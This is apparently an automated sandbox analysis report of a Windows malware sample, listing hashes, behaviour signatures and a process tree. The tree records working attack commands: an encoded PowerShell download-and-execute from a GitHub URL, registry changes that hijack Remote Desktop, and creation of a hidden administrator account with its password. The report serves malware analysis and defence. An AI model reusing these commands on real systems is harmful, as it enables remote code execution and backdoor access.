Resubmissions
- 02-09-2021 16:57  210902-vgpzjadhhn  10
- 02-09-2021 16:25  210902-tw1h5sage4  10
- 02-09-2021 11:31  210902-9dk89x9wb2  10
- 14-08-2021 13:56  210814-xdxpv1yk2x  10
Analysis
- max time kernel: 50s
- max time network: 117s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 14-08-2021 13:56
Tasks
- Static task: static1
- Behavioral task: behavioral1
  Sample: 472208d7ba18d4c14b7e90b9db5d6feb.exe
  Resource: win7v20210410
- Behavioral task: behavioral2
  Sample: 472208d7ba18d4c14b7e90b9db5d6feb.exe
  Resource: win10v20210410
General
- Target: 472208d7ba18d4c14b7e90b9db5d6feb.exe
- Size: 5.9MB
- MD5: 472208d7ba18d4c14b7e90b9db5d6feb
- SHA1: ff24cc43998ff99e61b1a838e1d51c4888498935
- SHA256: ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d
- SHA512: 9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15
Malware Config
Extracted
- https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
  This is the URL inside the base64 (UTF-16LE) -enc argument of the last powershell.exe in the process tree below; the encoded command is an IEX of (New-Object Net.Webclient).downloadstring against that URL.
Signatures
- Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  Processes (flow / pid / process):
  - flow 18, pid 3908, powershell.exe
  - flow 20, pid 3908, powershell.exe
  - flow 21, pid 3908, powershell.exe
  - flow 22, pid 3908, powershell.exe
  - flow 24, pid 3908, powershell.exe
  - flow 26, pid 3908, powershell.exe
  - flow 28, pid 3908, powershell.exe
  - flow 30, pid 3908, powershell.exe
  - flow 32, pid 3908, powershell.exe
- Modifies RDP port number used by Windows (1 TTPs)
- Sets DLL path for service in the registry (2 TTPs)
- Yara rule hits on dropped resources (signature title missing from the page; resource / yara_rule):
  - \Windows\Branding\mediasrv.png: upx
  - \Windows\Branding\mediasvc.png: upx
- Loads dropped DLL (2 IoCs)
  Processes (pid / process):
  - pid 3676
  - pid 3676
- Drops file in Program Files directory (4 IoCs)
  Processes (description / ioc / process):
  - File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT (powershell.exe)
  - File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI (powershell.exe)
  - File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT (powershell.exe)
  - File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI (powershell.exe)
- Drops file in Windows directory (19 IoCs)
  Processes (description / ioc / process):
  - File created: C:\Windows\branding\mediasvc.png (powershell.exe)
  - File opened for modification: C:\Windows\branding\wupsvc.jpg (powershell.exe)
  - File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_hqhgangy.rou.ps1 (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI71DA.tmp (powershell.exe)
  - File opened for modification: C:\Windows\branding\Basebrd (powershell.exe)
  - File opened for modification: C:\Windows\branding\mediasrv.png (powershell.exe)
  - File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_hkbi454m.uo3.psm1 (powershell.exe)
  - File created: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI71FA.tmp (powershell.exe)
  - File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
  - File created: C:\Windows\branding\mediasrv.png (powershell.exe)
  - File created: C:\Windows\branding\wupsvc.jpg (powershell.exe)
  - File opened for modification: C:\Windows\branding\mediasvc.png (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI722C.tmp (powershell.exe)
  - File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
  - File opened for modification: C:\Windows\branding\ShellBrd (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI720B.tmp (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI721C.tmp (powershell.exe)
  - File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat (powershell.exe)
- Modifies data under HKEY_USERS (64 IoCs)
- Modifies registry key (1 TTPs, 1 IoCs)
- Runs net.exe
- Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes (description / flow / ioc):
  - HTTP User-Agent header, flow 20: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  - HTTP User-Agent header, flow 21: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  - HTTP User-Agent header, flow 22: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  - HTTP User-Agent header, flow 24: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  Processes (pid / process):
  - pid 3172, powershell.exe
  - pid 3172, powershell.exe
  - pid 3172, powershell.exe
  - pid 2180, powershell.exe
  - pid 2180, powershell.exe
  - pid 2180, powershell.exe
  - pid 2416, powershell.exe
  - pid 2416, powershell.exe
  - pid 2416, powershell.exe
  - pid 1296, powershell.exe
  - pid 1296, powershell.exe
  - pid 1296, powershell.exe
  - pid 3172, powershell.exe
  - pid 3172, powershell.exe
  - pid 3172, powershell.exe
  - pid 3908, powershell.exe
  - pid 3908, powershell.exe
  - pid 3908, powershell.exe
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes (pid / process):
  - pid 624
  - pid 624
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (description / pid / process):
  - Token: SeDebugPrivilege (pid 3700, 472208d7ba18d4c14b7e90b9db5d6feb.exe)
  - Token: SeDebugPrivilege (pid 3172, powershell.exe)
  - Token: SeDebugPrivilege (pid 2180, powershell.exe)
  - Token: SeIncreaseQuotaPrivilege (pid 2180, powershell.exe)
  - Token: SeSecurityPrivilege (pid 2180, powershell.exe)
  - Token: SeTakeOwnershipPrivilege (pid 2180, powershell.exe)
  - Token: SeLoadDriverPrivilege (pid 2180, powershell.exe)
  - Token: SeSystemProfilePrivilege (pid 2180, powershell.exe)
  - Token: SeSystemtimePrivilege (pid 2180, powershell.exe)
  - Token: SeProfSingleProcessPrivilege (pid 2180, powershell.exe)
  - Token: SeIncBasePriorityPrivilege (pid 2180, powershell.exe)
  - Token: SeCreatePagefilePrivilege (pid 2180, powershell.exe)
  - Token: SeBackupPrivilege (pid 2180, powershell.exe)
  - Token: SeRestorePrivilege (pid 2180, powershell.exe)
  - Token: SeShutdownPrivilege (pid 2180, powershell.exe)
  - Token: SeDebugPrivilege (pid 2180, powershell.exe)
  - Token: SeSystemEnvironmentPrivilege (pid 2180, powershell.exe)
  - Token: SeRemoteShutdownPrivilege (pid 2180, powershell.exe)
  - Token: SeUndockPrivilege (pid 2180, powershell.exe)
  - Token: SeManageVolumePrivilege (pid 2180, powershell.exe)
  - Token: 33 (pid 2180, powershell.exe)
  - Token: 34 (pid 2180, powershell.exe)
  - Token: 35 (pid 2180, powershell.exe)
  - Token: 36 (pid 2180, powershell.exe)
  - Token: SeDebugPrivilege (pid 2416, powershell.exe)
  - Token: SeIncreaseQuotaPrivilege (pid 2416, powershell.exe)
  - Token: SeSecurityPrivilege (pid 2416, powershell.exe)
  - Token: SeTakeOwnershipPrivilege (pid 2416, powershell.exe)
  - Token: SeLoadDriverPrivilege (pid 2416, powershell.exe)
  - Token: SeSystemProfilePrivilege (pid 2416, powershell.exe)
  - Token: SeSystemtimePrivilege (pid 2416, powershell.exe)
  - Token: SeProfSingleProcessPrivilege (pid 2416, powershell.exe)
  - Token: SeIncBasePriorityPrivilege (pid 2416, powershell.exe)
  - Token: SeCreatePagefilePrivilege (pid 2416, powershell.exe)
  - Token: SeBackupPrivilege (pid 2416, powershell.exe)
  - Token: SeRestorePrivilege (pid 2416, powershell.exe)
  - Token: SeShutdownPrivilege (pid 2416, powershell.exe)
  - Token: SeDebugPrivilege (pid 2416, powershell.exe)
  - Token: SeSystemEnvironmentPrivilege (pid 2416, powershell.exe)
  - Token: SeRemoteShutdownPrivilege (pid 2416, powershell.exe)
  - Token: SeUndockPrivilege (pid 2416, powershell.exe)
  - Token: SeManageVolumePrivilege (pid 2416, powershell.exe)
  - Token: 33 (pid 2416, powershell.exe)
  - Token: 34 (pid 2416, powershell.exe)
  - Token: 35 (pid 2416, powershell.exe)
  - Token: 36 (pid 2416, powershell.exe)
  - Token: SeDebugPrivilege (pid 1296, powershell.exe)
  - Token: SeIncreaseQuotaPrivilege (pid 1296, powershell.exe)
  - Token: SeSecurityPrivilege (pid 1296, powershell.exe)
  - Token: SeTakeOwnershipPrivilege (pid 1296, powershell.exe)
  - Token: SeLoadDriverPrivilege (pid 1296, powershell.exe)
  - Token: SeSystemProfilePrivilege (pid 1296, powershell.exe)
  - Token: SeSystemtimePrivilege (pid 1296, powershell.exe)
  - Token: SeProfSingleProcessPrivilege (pid 1296, powershell.exe)
  - Token: SeIncBasePriorityPrivilege (pid 1296, powershell.exe)
  - Token: SeCreatePagefilePrivilege (pid 1296, powershell.exe)
  - Token: SeBackupPrivilege (pid 1296, powershell.exe)
  - Token: SeRestorePrivilege (pid 1296, powershell.exe)
  - Token: SeShutdownPrivilege (pid 1296, powershell.exe)
  - Token: SeDebugPrivilege (pid 1296, powershell.exe)
  - Token: SeSystemEnvironmentPrivilege (pid 1296, powershell.exe)
  - Token: SeRemoteShutdownPrivilege (pid 1296, powershell.exe)
  - Token: SeUndockPrivilege (pid 1296, powershell.exe)
  - Token: SeManageVolumePrivilege (pid 1296, powershell.exe)
- Suspicious use of WriteProcessMemory (64 IoCs)
Processes
Process tree; children are indented under their parent. Each entry gives the image path, the command line, the signatures triggered by that process, and its PID.

- C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"
  signatures: Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  PID: 3700
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    signatures: Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    PID: 3172
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\h5gwndpi\h5gwndpi.cmdline"
      signatures: Suspicious use of WriteProcessMemory
      PID: 2868
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3713.tmp" "c:\Users\Admin\AppData\Local\Temp\h5gwndpi\CSCE88D18F7685843079321122E24848875.TMP"
        PID: 2940
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      PID: 2180
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      PID: 2416
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      PID: 1296
    - C:\Windows\system32\reg.exe
      cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      PID: 2120
    - C:\Windows\system32\reg.exe
      cmdline: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      signatures: Modifies registry key
      PID: 1916
    - C:\Windows\system32\reg.exe
      cmdline: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
      PID: 2740
    - C:\Windows\system32\net.exe
      cmdline: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      signatures: Suspicious use of WriteProcessMemory
      PID: 3912
      - C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        PID: 2420
    - C:\Windows\system32\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      signatures: Suspicious use of WriteProcessMemory
      PID: 3940
      - C:\Windows\system32\cmd.exe
        cmdline: cmd /c net start rdpdr
        signatures: Suspicious use of WriteProcessMemory
        PID: 3580
        - C:\Windows\system32\net.exe
          cmdline: net start rdpdr
          signatures: Suspicious use of WriteProcessMemory
          PID: 2272
          - C:\Windows\system32\net1.exe
            cmdline: C:\Windows\system32\net1 start rdpdr
            PID: 2184
    - C:\Windows\system32\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      signatures: Suspicious use of WriteProcessMemory
      PID: 2072
      - C:\Windows\system32\cmd.exe
        cmdline: cmd /c net start TermService
        signatures: Suspicious use of WriteProcessMemory
        PID: 1512
        - C:\Windows\system32\net.exe
          cmdline: net start TermService
          signatures: Suspicious use of WriteProcessMemory
          PID: 1800
          - C:\Windows\system32\net1.exe
            cmdline: C:\Windows\system32\net1 start TermService
            PID: 1344
    - C:\Windows\system32\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
      PID: 3196
    - C:\Windows\system32\cmd.exe
      cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
      PID: 1376
- C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe user WgaUtilAcc 000000 /del
  signatures: Suspicious use of WriteProcessMemory
  PID: 508
  - C:\Windows\system32\net.exe
    cmdline: net.exe user WgaUtilAcc 000000 /del
    signatures: Suspicious use of WriteProcessMemory
    PID: 2180
    - C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
      PID: 1208
- C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe user WgaUtilAcc 40AuUe9q /add
  signatures: Suspicious use of WriteProcessMemory
  PID: 3296
  - C:\Windows\system32\net.exe
    cmdline: net.exe user WgaUtilAcc 40AuUe9q /add
    signatures: Suspicious use of WriteProcessMemory
    PID: 1376
    - C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 user WgaUtilAcc 40AuUe9q /add
      PID: 3908
- C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  signatures: Suspicious use of WriteProcessMemory
  PID: 3940
  - C:\Windows\system32\net.exe
    cmdline: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    signatures: Suspicious use of WriteProcessMemory
    PID: 2740
    - C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
      PID: 2636
- C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
  signatures: Suspicious use of WriteProcessMemory
  PID: 1296
  - C:\Windows\system32\net.exe
    cmdline: net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
    signatures: Suspicious use of WriteProcessMemory
    PID: 2496
    - C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
      PID: 2272
- C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  signatures: Suspicious use of WriteProcessMemory
  PID: 3912
  - C:\Windows\system32\net.exe
    cmdline: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    signatures: Suspicious use of WriteProcessMemory
    PID: 2480
    - C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
      PID: 1300
- C:\Windows\System32\cmd.exe
  cmdline: cmd /C net.exe user WgaUtilAcc 40AuUe9q
  signatures: Suspicious use of WriteProcessMemory
  PID: 3180
  - C:\Windows\system32\net.exe
    cmdline: net.exe user WgaUtilAcc 40AuUe9q
    signatures: Suspicious use of WriteProcessMemory
    PID: 2880
    - C:\Windows\system32\net1.exe
      cmdline: C:\Windows\system32\net1 user WgaUtilAcc 40AuUe9q
      PID: 2628
- C:\Windows\System32\cmd.exe
  cmdline: cmd.exe /C wmic path win32_VideoController get name
  signatures: Suspicious use of WriteProcessMemory
  PID: 1332
  - C:\Windows\System32\Wbem\WMIC.exe
    cmdline: wmic path win32_VideoController get name
    signatures: Modifies data under HKEY_USERS
    PID: 2180
- C:\Windows\System32\cmd.exe
  cmdline: cmd.exe /C wmic CPU get NAME
  PID: 3296
  - C:\Windows\System32\Wbem\WMIC.exe
    cmdline: wmic CPU get NAME
    signatures: Modifies data under HKEY_USERS
    PID: 3348
- C:\Windows\System32\cmd.exe
  cmdline: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  PID: 1820
  - C:\Windows\system32\cmd.exe
    cmdline: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    PID: 776
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      signatures: Blocklisted process makes network request; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
      PID: 3908
Network
MITRE ATT&CK Enterprise v6
Downloads